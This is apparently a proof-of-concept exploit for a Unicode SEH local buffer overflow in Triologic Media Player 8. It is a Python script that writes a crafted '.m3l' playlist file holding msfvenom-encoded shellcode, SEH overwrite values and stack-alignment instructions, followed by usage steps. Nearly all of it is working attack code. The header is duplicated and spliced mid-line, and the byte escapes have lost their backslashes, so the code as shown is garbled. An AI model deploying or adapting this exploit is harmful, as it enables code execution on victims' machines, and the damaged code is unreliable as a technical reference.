# Date: 04/04/2020
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Tr # Exploit Title: Triologic Media Player 8 - '.m3l' Local Buffer Overflow (Unicode) (SEH)
# Date: 04/04/2020
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
# Version: 8
# Tested on: Windows 7 (x86)
# Proof of Concept:
# 1.- Run the python script, it will create a new file called "poc.m3l".
# 2.- Open the Application.
# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
# 5.- Select the file "poc.m3l".
# 6.- Profit.
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread
# Payload size: 512 bytes
buf = b""
buf += b"x50x50x59x41x49x41x49x41x49x41x49x41x49"
buf += b"x41x49x41x49x41x49x41x49x41x49x41x49x41"
buf += b"x49x41x49x41x49x41x6ax58x41x51x41x44x41"
buf += b"x5ax41x42x41x52x41x4cx41x59x41x49x41x51"
buf += b"x41x49x41x51x41x49x41x68x41x41x41x5ax31"
buf += b"x41x49x41x49x41x4ax31x31x41x49x41x49x41"
buf += b"x42x41x42x41x42x51x49x31x41x49x51x49x41"
buf += b"x49x51x49x31x31x31x41x49x41x4ax51x59x41"
buf += b"x5ax42x41x42x41x42x41x42x41x42x6bx4dx41"
buf += b"x47x42x39x75x34x4ax42x79x6cx7ax48x61x72"
buf += b"x39x70x6bx50x49x70x73x30x54x49x47x75x70"
buf += b"x31x79x30x4fx74x72x6bx70x50x70x30x32x6b"
buf += b"x51x42x7ax6cx74x4bx42x32x6ex34x64x4bx64"
buf += b"x32x6bx78x6cx4fx57x47x4dx7ax4dx56x4ex51"
buf += b"x59x6fx46x4cx4fx4cx71x51x61x6cx49x72x4c"
buf += b"x6cx6dx50x36x61x46x6fx6cx4dx4ax61x37x57"
buf += b"x69x52x7ax52x31x42x51x47x74x4bx6ex72x4a"
buf += b"x70x44x4bx30x4ax4dx6cx34x4bx6ex6cx5ax71"
buf += b"x74x38x39x53x6dx78x49x71x5ax31x70x51x62"
buf += b"x6bx70x59x6bx70x5ax61x46x73x62x6bx4ex69"
buf += b"x4ax78x48x63x4fx4ax61x39x72x6bx4dx64x62"
buf += b"x6bx4ax61x36x76x4cx71x59x6fx44x6cx45x71"
buf += b"x58x4fx6ax6dx49x71x39x37x4dx68x39x50x73"
buf += b"x45x58x76x69x73x43x4dx4cx38x4fx4bx31x6d"
buf += b"x4cx64x72x55x58x64x72x38x62x6bx30x58x4f"
buf += b"x34x6ax61x7ax33x31x56x54x4bx4cx4cx6ex6b"
buf += b"x44x4bx50x58x4dx4cx4ax61x38x53x72x6bx5a"
buf += b"x64x54x4bx5ax61x58x50x33x59x61x34x6dx54"
buf += b"x6cx64x71x4bx51x4bx6fx71x62x39x70x5ax6f"
buf += b"x61x79x6fx47x70x61x4fx61x4fx71x4ax44x4b"
buf += b"x4dx42x38x6bx34x4dx4fx6dx42x4ax49x71x62"
buf += b"x6dx42x65x45x62x69x70x39x70x59x70x50x50"
buf += b"x51x58x4dx61x74x4bx42x4fx33x57x6bx4fx46"
buf += b"x75x37x4bx47x70x6bx6dx6ex4ax5ax6ax53x38"
buf += b"x46x46x52x75x65x6dx45x4dx6bx4fx57x65x6d"
buf += b"x6cx7ax66x43x4cx6cx4ax35x30x59x6bx67x70"
buf += b"x50x75x6bx55x45x6bx4dx77x5ax73x32x52x52"
buf += b"x4fx30x6ax59x70x51x43x69x6fx38x55x52x43"
buf += b"x50x61x32x4cx61x53x6cx6ex43x35x51x68x6f"
buf += b"x75x4dx30x41x41"
nseh = "x71x41"
seh = "x41x4a"
alignment = ""
alignment += "x54x71" # push ebx, padding
alignment += "x58x71" # pop eax, padding
alignment += "x05x20x22" # add eax, 0x22002000
alignment += "x71" # Padding
alignment += "x2Dx19x22" # sub eax, 0x22001900
alignment += "x71" # Padding
alignment += "x50x71" # push eax, padding
alignment += "xC3" # retn
buffer = "A" * 536 + nseh + seh + "x41x71x41x71" + alignment + "C" * 71 + buf + "C" * 2000
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()